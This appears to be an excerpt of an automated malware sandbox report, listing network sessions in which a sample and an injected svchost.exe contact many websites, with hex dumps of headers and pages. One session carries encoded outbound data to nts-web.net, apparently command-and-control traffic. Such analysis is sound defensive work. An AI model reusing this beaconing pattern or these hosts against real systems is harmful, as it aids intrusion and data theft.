                                                                                                                                                                                                                                                                        Data Ascii: ipt' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/a
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2731INData Raw: 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b
                                                                                                                                                                                                                                                                        Data Ascii: ps://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="120x120" href="https://dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2739INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 50 72 69 63 69 6e 67 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                                                                                        Data Ascii: menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-text">Pricing</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-it
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2747INData Raw: 66 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 73 63 72 69 70 74 73 2e 6a 73 3f 76 65 72 3d 35 2e 31 2e 33 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 67 6f 5f 70 72 69 63 69 6e 67
                                                                                                                                                                                                                                                                        Data Ascii: form-7\/v1"}};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/go_pricing


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        17192.168.2.650436138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC215OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC215INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:14 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC215INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        170192.168.2.66536583.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2587OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2752INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                        Keep-Alive: timeout=2, max=94
                                                                                                                                                                                                                                                                        Content-Length: 48940
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                        X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:31 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2752INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2754INData Raw: 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 44 61 74 61 66 6f 72 6d 20 2d 20 4d 61 6e 61 67 65 20 46 6f 72 6d 73 2c 20 44 65 76 69 63 65 73 20 26 61 6d 70 3b 20 44 61 74 61 46 6f 72 6d 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66
                                                                                                                                                                                                                                                                        Data Ascii: ww.google.com'/><link rel='dns-prefetch' href='//fonts.googleapis.com'/><link rel='dns-prefetch' href='//s.w.org'/><link rel="alternate" type="application/rss+xml" title="Dataform - Manage Forms, Devices &amp; DataForm &raquo; Feed" href="https://dataf
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2762INData Raw: 66 69 6c 6c 3d 27 72 67 62 61 25 32 38 35 31 25 32 43 35 31 25 32 43 35 31 25 32 43 30 2e 32 35 25 32 39 27 20 74 72 61 6e 73 66 6f 72 6d 3d 27 72 6f 74 61 74 65 28 32 37 30 20 35 30 20 35 30 29 20 74 72 61 6e 73 6c 61 74 65 28 30 20 2d 33 30 29 27 25 33 45 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 6f 70 61 63 69 74 79 27 20 66 72 6f 6d 3d 27 31 27 20 74 6f 3d 27 30 27 20 64 75 72 3d 27 31 73 27 20 62 65 67 69 6e 3d 27 30 2e 37 35 73 27 20 72 65 70 65 61 74 43 6f 75 6e 74 3d 27 69 6e 64 65 66 69 6e 69 74 65 27 2f 25 33 45 25 33 43 2f 72 65 63 74 25 33 45 25 33 43 72 65 63 74 20 20 78 3d 27 34 36 2e 35 27 20 79 3d 27 34 30 27 20 77 69 64 74 68 3d 27 37 27 20 68 65 69 67 68 74 3d 27 32 30 27 20 72 78 3d 27 35 27 20
                                                                                                                                                                                                                                                                        Data Ascii: fill='rgba%2851%2C51%2C51%2C0.25%29' transform='rotate(270 50 50) translate(0 -30)'%3E %3Canimate attributeName='opacity' from='1' to='0' dur='1s' begin='0.75s' repeatCount='indefinite'/%3E%3C/rect%3E%3Crect x='46.5' y='40' width='7' height='20' rx='5'
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2770INData Raw: 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 4c 61 79 65 72 53 6c 69 64 65 72 2f 73 74 61 74 69 63 2f 6c 61 79 65 72 73 6c 69 64 65 72 2f 6a 73 2f 67 72 65 65 6e 73 6f 63 6b 2e 6a 73 3f 76 65 72 3d 31 2e 31 39 2e 30 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 4c 61 79 65 72 53 6c 69 64 65 72 2f 73 74 61 74 69 63 2f 6c 61 79 65 72 73 6c 69 64 65 72 2f 6a 73 2f 6c 61 79 65 72 73 6c 69 64 65 72 2e 6b 72 65 61 74 75 72 61 6d 65 64 69 61 2e 6a 71 75 65 72 79 2e 6a 73
                                                                                                                                                                                                                                                                        Data Ascii: ps://dataform.co.uk/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js?ver=1.19.0'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreaturamedia.jquery.js
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2778INData Raw: 6d 6e 5f 74 65 78 74 5d 5b 76 63 5f 62 74 6e 20 74 69 74 6c 65 3d 26 23 38 32 32 31 3b 52 45 51 55 45 53 54 20 44 45 4d 4f 26 23 38 32 32 31 3b 20 73 74 79 6c 65 3d 26 23 38 32 32 31 3b 6f 75 74 6c 69 6e 65 26 23 38 32 32 31 3b 20 63 6f 6c 6f 72 3d 26 23 38 32 32 31 3b 77 68 69 74 65 26 23 38 32 32 31 3b 20 6c 69 6e 6b 3d 26 23 38 32 32 31 3b 75 72 6c 3a 25 32 46 72 65 71 75 65 73 74 2d 64 65 6d 6f 25 32 46 7c 7c 7c 26 23 38 32 32 31 3b 20 63 73 73 3d 26 23 38 32 32 31 3b 2e 76 63 5f 63 75 73 74 6f 6d 5f 31 36 31 34 31 38 34 33 38 32 31 30 30 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 32 30 70 78 26 68 65 6c 6c 69 70 3b 22 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 64
                                                                                                                                                                                                                                                                        Data Ascii: mn_text][vc_btn title=&#8221;REQUEST DEMO&#8221; style=&#8221;outline&#8221; color=&#8221;white&#8221; link=&#8221;url:%2Frequest-demo%2F|||&#8221; css=&#8221;.vc_custom_1614184382100{padding-top: 20px&hellip;"/><meta property="og:url" content="https://d
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2786INData Raw: 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 32 35 34 34 20 66 69 72 73 74 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 72 65 73 6f 75 72 63 65 73 2f 68 65 6c 70 2d 63 65 6e 74 72 65 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 32 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 48 65 6c 70 20 43 65 6e 74 72 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65
                                                                                                                                                                                                                                                                        Data Ascii: -type-post_type menu-item-object-page menu-item-52544 first"><a href='https://dataform.co.uk/resources/help-centre/' data-level='2'><span class="menu-item-text"><span class="menu-text">Help Centre</span></span></a></li> <li class="menu-item menu-item-type
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2794INData Raw: 6f 6f 74 65 72 3e 3c 21 2d 2d 20 23 66 6f 6f 74 65 72 20 2d 2d 3e 0a 0a 0a 09 3c 61 20 68 72 65 66 3d 22 23 22 20 63 6c 61 73 73 3d 22 73 63 72 6f 6c 6c 2d 74 6f 70 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 22 3e 47 6f 20 74 6f 20 54 6f 70 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 0a 3c 2f 64 69 76 3e 3c 21 2d 2d 20 23 70 61 67 65 20 2d 2d 3e 0a 0a 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 6d 6f 64 61 6c 22 3e 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 73 74 61 72 74 63 6c 6f 63 6b 28 29 3b 7d 29 3b 66 75 6e
                                                                                                                                                                                                                                                                        Data Ascii: ooter>... #footer --><a href="#" class="scroll-top"><span class="screen-reader-text">Go to Top</span></a></div>... #page --><script type="text/javascript" id="modal">document.addEventListener("DOMContentLoaded",function(){startclock();});fun


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        171192.168.2.66495049.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2588OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net
                                                                                                                                                                                                                                                                        Content-Length: 5456
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2588OUTData Raw: 6f 43 56 51 62 49 47 49 69 34 32 50 6b 70 2b 6a 70 61 65 70 72 4b 36 77 73 37 58 42 6d 47 77 79 47 55 71 76 4d 30 6e 56 69 51 56 6e 39 6c 2b 33 6f 41 68 68 59 42 50 5a 48 54 44 59 77 6f 2b 74 4e 67 56 36 45 35 6f 42 6e 59 37 66 76 7a 6b 48 53 38 32 79 6d 37 61 6d 66 35 39 38 72 49 55 62 51 53 4e 67 76 4d 51 50 74 64 33 37 35 67 6d 6f 66 58 2b 6a 32 6b 73 76 61 63 51 31 44 61 47 71 35 34 48 48 4b 33 32 4a 31 67 2b 36 4d 39 52 4f 51 5a 35 4c 74 36 66 33 76 37 4e 73 51 74 6e 67 43 71 6d 34 46 70 73 2b 56 73 6e 67 56 48 47 4e 64 4f 36 38 70 72 65 66 6c 70 45 51 6f 75 4f 56 45 4d 78 38 51 51 69 66 70 2f 73 68 5a 37 6d 6c 56 2b 42 37 56 49 59 61 5a 53 6b 31 44 51 72 45 77 71 55 56 4e 7a 58 53 59 6c 73 63 69 30 53 55 78 73 55 31 41 6e 2f 50 35 6a 50 59 52 35 67
                                                                                                                                                                                                                                                                        Data Ascii: oCVQbIGIi42Pkp+jpaeprK6ws7XBmGwyGUqvM0nViQVn9l+3oAhhYBPZHTDYwo+tNgV6E5oBnY7fvzkHS82ym7amf598rIUbQSNgvMQPtd375gmofX+j2ksvacQ1DaGq54HHK32J1g+6M9ROQZ5Lt6f3v7NsQtngCqm4Fps+VsngVHGNdO68preflpEQouOVEMx8QQifp/shZ7mlV+B7VIYaZSk1DQrEwqUVNzXSYlsci0SUxsU1An/P5jPYR5g


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        172192.168.2.665421185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2593OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2593INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:30 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2594INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        173192.168.2.665438185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2594OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2594INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:30 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2595INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        174192.168.2.61043188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2596OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2597INHTTP/1.1 302 Found
